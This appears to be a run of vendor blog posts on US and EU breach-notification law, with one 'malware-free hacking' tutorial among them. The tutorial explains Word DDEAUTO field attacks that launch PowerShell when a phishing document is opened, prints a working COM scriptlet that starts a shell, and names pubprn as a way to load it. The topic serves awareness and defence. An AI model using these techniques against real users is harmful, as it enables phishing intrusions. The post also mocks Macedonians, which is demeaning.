In the US, unlike in the EU, there is no single federal data security and breach notification law that covers private sector companies. Sure, we do have HIPAA and GLBA for healthcare and financial, but there isn’t an equivalent to the EU’s GPDR or, say, Canada’s PIPEDA. I’m aware that we have state breach notification laws, but for the most part they’re limited in the PII they cover and have a fairly high threshold for reporting incidents.

However, with this last SEC guidance, we have, for the first time, something like a national data security rule of thumb — not an obligation but rather a strong suggestion —  to have data security controls and reporting in place.

The SEC guidance is based on what investors should be made aware of and wouldn’t necessarily cover serious cybersecurity risks and incidents that don’t have a material financial or business impact.

However, it’s certainly an indication that change is afoot, and US public companies should be thinking about upping their data security game before they’re ultimately required to do so through a future law.

Let’s just say they have been warned.

North Carolina Proposes Tougher Breach Notification Rules

North Carolina Proposes Tougher Breach Notification Rules

If you’ve been reading our amazing blog content and whitepaper on breach notification laws in the US and worldwide, you know there’s often a hidden loophole in the legalese. The big issue — at least for data security nerds — is whether the data security law considers mere unauthorized access of personally identifiable information (PII) to be worthy of a notification.

This was a small legal point until something called ransomware came along.

You have heard of ransomware, right?

It’s that low-tech, but deadly malware that accesses data and encrypts it. To get the data back, the victim has to send a couple of bitcoins to the digital extortionists.

Last year ransomware had more than a few high-profile victims in the US, as well as, of course, across the globe.

But at the US state level, the difference between access alone and access and acquisition — the legal verbiage for copying — in a notification law determines whether the breach is to be reported to local authorities.

Based on my own research, I could only find a few states for which a ransomware attack would have to be reported locally. I should add that even for states that allow for just unauthorized access of PII, there’s often an additional “harm threshold” to the consumer—financial or credit risk, for example— that would have to be met, and so would rule out a pure ransomware attack in which the data wasn’t copied.

After factoring this in, I found only three states for which a ransomware attack ipso facto  I finally get to use that phrase! — would require a notification: New Jersey, Connecticut, and Virginia.

You can look through these charts prepared by some law firms for yourself, and if you come up with other candidates, let me know!

North Carolina: Laboratory of Democracy!

But wait, a legislator in the great state of North Carolina along with the attorney general last month proposed a change to the statutory language defining a breach.

This tweak moves NC from a state that considers a breach to be unauthorized access and acquisition — see section 75-61 (14) of its statutes — to unauthorized access or acquisition.

Now NC joins the aforementioned club for which ransomware attacks will by themselves force companies to notify authorities and consumers.

The new law will also change the time window in which the data breach will have to be reported after discovery. Searching through a huge PDF table of state breach laws, I can say most if not all states ask that a breach be reported “without unreasonable delay.”

Obviously, these words can be subject to interpretation. The proposed NC law instead sets the time limit to just 15 days.

I’m not aware of any other state that has a specific deadline.

The new law also adds consumer-friendly language that makes credit freezes — remember the outcry after Equifax — free upon request. Up to five years of credit monitoring will also be free of charge.

The law is supposed to tighten the rules on fines as well.

We’ll have to wait for the legislation to be reviewed and approved before we have the final legal details.

We’ll keep you posted.

North Carolina Has Lots of Breaches

On looking at their 2017 annual breach report produced by their Department of Justice, I was surprised to learn that over 1000 breaches were reported in this state alone.

That’s an incredibly large number. For comparison purposes, take a peek at California’s breach report for the years 2012- 2015. The incident counts are dramatically smaller— 178 in 2015.

I’m not sure what explains the difference.  But perhaps NC clearly has lots of law-abiding businesses, especially consumer-facing ones holding PII.

By the way, the current NC law covers an extensive list of identifiers, not only the usual social security, driver’s license, and account numbers, but also PINs, online passwords, digital signatures, and email addresses. This broad PII definition may have something to do with the NC data breach reporting spike we’re seeing.

In any case, if you combine their generous list of PII and the newer  breach notification rules, then you’ll have to admit that NC has upped its digital security game and may even be number one, moving past the formidable California and its tough breach law.

And of course, go Wolfpack.

What to be a legal eagle amongst your IT security peers when it comes to breach notification laws and ransomware? Download our comprehensive white paper on this fascinating subject!

Adventures in Malware-Free Hacking, Part IV

Adventures in Malware-Free Hacking, Part IV

For this next post, I was all ready to dive into a more complicated malware-free attack scenario involving multiple stages and persistence. Then I came across an incredibly simple code-free attack — no Word or Excel macro required! — that far more effectively proves the underlying premise in this series: it ain’t that hard to get past the perimeter.

The first attack I’ll describe is based on a Microsoft Word vulnerability involving the archaic Dynamic Data Exchange (DDE) protocol. It was only very recently patched. The second one leverages a more general vulnerability with Microsoft COM and its object passing capabilities.

Back to the DDE Future

Does anyone remember DDE? Probably not. It was an early inter-process communication protocol that allowed apps and devices to pass data.

I’m a little familiar with it because I used to review and test telecom gear – well, someone had to do it. At the time, DDE let caller ids pass to CRM apps that would ultimately pop-up a customer contact record for a call center agents. Yeah, you had to connect an RS-232 cable between the phone and the computer. Those were the days!

As it turns out, at this late date, Microsoft Word still supports DDE.

What makes this attack effectively code-free is that you can access the DDE protocol directly from Windows field codes. (Hat tip to SensePost for researching and writing about it.)

Field codes are another ancient MS Word feature that lets you add dynamic text and a bit of programming into a document The most obvious example of this is the  page numbers, which can be inserted into a footer using this field code {PAGE \*MERGEFORMAT}. It allows page numbers to be magically generated.

Pro tip: you can access field codes from the text section of the Word ribbon.

I remember first discovering this Word feature as a young lad and being amazed.

Until the patch disabled it, Word supported a DDE field option. The idea was that DDE would let Word communicate with an app and then embed the output in the document. This was an early version of an idea –communicating with external apps — that was later taken over by COM, which will get to below.

Anyway, hackers realized that the DDE app can be, wait for it, a vanilla command shell! The command shell, of course, launches PowerShell and from there hackers can do just about anything.

In the screenshot below, you can see how I used the stealthy technique introduced a few posts back: the teeny PowerShell script in the DDE field downloads more PowerShell, which then starts the second phase of the attack.

Thank you Windows for warning us that an embedded DDEAUTO field sneakily launches a shell.

The preferred method is to use a variant, the DDEAUTO field, which automatically launches the script when the Word document is opened.

Let’s step back.

As a beginning hacker, you can send a scary phish mail, pretending to be from the IRS, and embed a DDEAUTO field with a teeny first-stage PS script. You don’t have to do any real coding with the MS macro library, as I did in the last post.

The CEO opens the Word doc, the embedded script is activated, and the hacker is effectively inside the laptop. In my case, the remote PS script pops up a message, but it could just as easily have launched a PS Empire client that would grant shell access.

And before you can say Macedonia, the hackers are the wealthiest teenagers in their village.

A shell was launched without any real coding. Even a Macedonian child could do this!

It’s so easy!

DDE and Fields

After some prodding, Microsoft disabled DDE in Word, but at first they said that the feature was just being misused. Their reluctance is somewhat understandable.

From what I can see (based on a sample of one data security company) field updating on opening a document is enabled and Word macros are disabled (with notification) by IT groups. By the way, you can find the relevant configuration settings in the Options section of Word.

However, even when field updating is enabled, Microsoft Word additionally prompts the user when a field is accessing remote data, as is the case with DDE (see above). Microsoft does indeed warn you.

But as we know from Dr. Zinaida Benenson, users will click away and ultimately activate the field update.

This is a roundabout way of thanking Microsoft for disabling the dangerous DDE feature.

How difficult is it to find an unpatched Windows environment?

For my own testing, I used AWS Workspaces to access a virtual desktop. And it was pretty easy to obtain an unpatched VM with MS Office that let me insert a DDEAUTO field.

No doubt there are, cough, more than a few corporate sites that still haven’t added the security patch.

The Mystery of Objects

Even if you have added their patch, there are other security holes in MS Office that let hackers accomplish something very similar to what we did with Word. In this next scenario, we’ll learn how to leverage Excel as the phish bait in a code-free attack.

To first understand this next scenario, let’s step a back a little to consider Microsoft Component Object Model or COM.

COM has been around since the 1990s and is described as a “language neutral, object-oriented component model” based on remote procedure calls. Read this StackOverflow post for basic COM definitions and terminology.

Generally, you can think of a COM app as Excel or Word or some other running binary executable.

As with all things more Microsoft, it’s more complicated than that.  It turns out that a COM app can alsobe a script—JScript or VBScript. Technically, it’s called a scriptlet. You may have seen the .sct extension for a Windows file, which is the official suffix for scriptlets. These scriptlets are essentially scripting code encased in XML (below).

<?XML version="1.0"?>

<scriptlet>
<registration
description="test"
progid="test"
version="1.00"
classid="{BBBB4444-0000-0000-0000-0000FAADACDC}"
remotable="true">
</registration>
<script language="JScript">
<![CDATA[

var r = new ActiveXObject("WScript.Shell").Run("cmd /k powershell -c Write-Host You have been scripted!");

]]>
</script>
</scriptlet>

Hacker and pen testers discovered that there are Windows utilities and apps that accept COM objects and, by extension, these user-crafted COM scriptlets.

Let’s call it a day!

Your homework is to watch this Derbycon video from 2016, which explains how hackers and pen testers have taken advantage of scriptlets. And also read this post on scriptlets and something called monikers.

To get ahead of the story, I can pass a scriptlet to a Windows utility, written in VBS, known as pubprn, which is buried in C:\Windows\system32\Printing_Admin_Scripts. By the way, there are other Windows utilities that take objects as parameters; we’ll just look at this particular one first.

It’s only natural that you can launch a shell from a printing script. Go Microsoft!

For my own testing I crafted a simple remote scriptlet that launches a shell and prints a “boo” message. Effectively, pubprn instantiates the scriptlet object thereby allowing the VBScript code to launch a shell.

This technique provides obvious advantages to hackers who want to “live off the land” and lurk in your system undetected

In the next post, I’ll explain how COM scriptlets can be exploited by hackers within an Excel spreadsheet.

 

 

 

Continue reading the next post in "Malware-Free Hacking"

Post-Davos Thoughts on the EU NIS Directive

Post-Davos Thoughts on the EU NIS Directive

I’ve been meaning to read the 80-page report published by the World Economic Forum (WEF) on the global risks humankind now faces. They’re the same folks who bring you the once a year gathering of the world’s bankers and other lesser humanoids held at a popular Swiss ski resort. I was told there was an interesting section on … data security.

And there was. Data security is part of a report intended to help our world leaders also grapple with climate change, nuclear annihilation, pandemics, economic meltdowns, starvation, and  terrorism.

How serious a risk are cyber attacks?

In terms of impact, digital warfare makes the WEF top-ten list of global issues, ranking in the sixth position, between water and food crises, and beating out the spread of infectious diseases in the tenth position. It’s practically a fifth horsemen of the apocalypse.

Some of the worrying factoids that the WEF brought to the attention of presidents, prime ministers, chancellors, and kings was that in 2016 over 350 million malware variants were unleashed on the world, and that by 2020, malware may potentially finds its way to over 8.4 billion IoT devices.

There are about 7.6 billion of us now, and so we’ll soon be outnumbered by poorly secured internet connected silicon-based gadgets. It’s not a very comforting thought.

The WEF then tried to calculate the economic damage of malware. One study they reference puts the global cost at $8 trillion over the next five years.

The gloomy WEF authors single out the economic impact of ransomware. Petya and NotPetya were responsible for large costs to many companies in 2017. Merck, FedEx, and Maersk, for example, each reported offsets to their bottom line of over $300 million last year as a result of NotPetya attacks.

Systemic Risk: We’re All Connected

However, the effects of malware extend beyond economics. One of the important points the report makes is that hackers are also targeting physical infrastructure.

WannaCry was used against the IT systems of railway providers, car manufacturers, and energy utilities. In other words, cyberattacks are disrupting things from happening in the real-world: our lights going out, our transportation halted, or factory lines shut down all because of malware.

And here’s where the WEF report gets especially frightening. Cyber attacks can potentially start a chain reaction of effects that we humans are not good at judging. They call it “systemic risk”

They put it this way:

“Humanity has become remarkably adept at understanding how to mitigate countless conventional risks that can be relatively easily isolated and managed with standard risk management approaches. But we are much less competent when it comes to dealing with complex risks in systems characterized by feedback loops, tipping points and opaque cause-and-effect relationships that can make intervention problematic.”

You can come up with your own doomsday scenarios – malware infects stock market algorithms leading to economic collapse and then war – but the more important point, I think, is that our political leaders will be forced to start addressing this problem.

And yes I’m talking about more regulations or stricter standards on the IT systems used to run our critical infrastructure.

NIS Directive

In the EU, the rules of the road for protecting this infrastructure are far more evolved than in the US. We wrote about the Network and Information Security (NIS) Directive way back in 2016 when it was first approved by the EU Parliament.

The Directive asks EU member states to improve co-operation regarding cyber-attacks against critical sectors of the economy — health, energy, banking, telecom, transportation, as well as some online businesses — and to set minimum standards for cyber security preparedness, including incident notification to regulators. The EU countries had 21 months to “transpose” the directive into national laws.

That puts the deadline for these NIS laws at May 2018, which is just a few months away. Yes, May will be a busy month for IT departments as both the GDPR and NIS go into effect.

For example, the UK recently ended the consultation period for its NIS law. You can read the results of the report here. One key thing to keep in mind is that each national data regulator or authority will be asked to designate operators of “essential services”, EU-speak for critical infrastructure. They have 6-months starting in May to do this.

Anyway, the NIS Directive is a very good first step in monitoring and evaluating malware-based systemic risk. We’ll keep you posted as we learn more from the national regulators as they start implementing their NIS laws.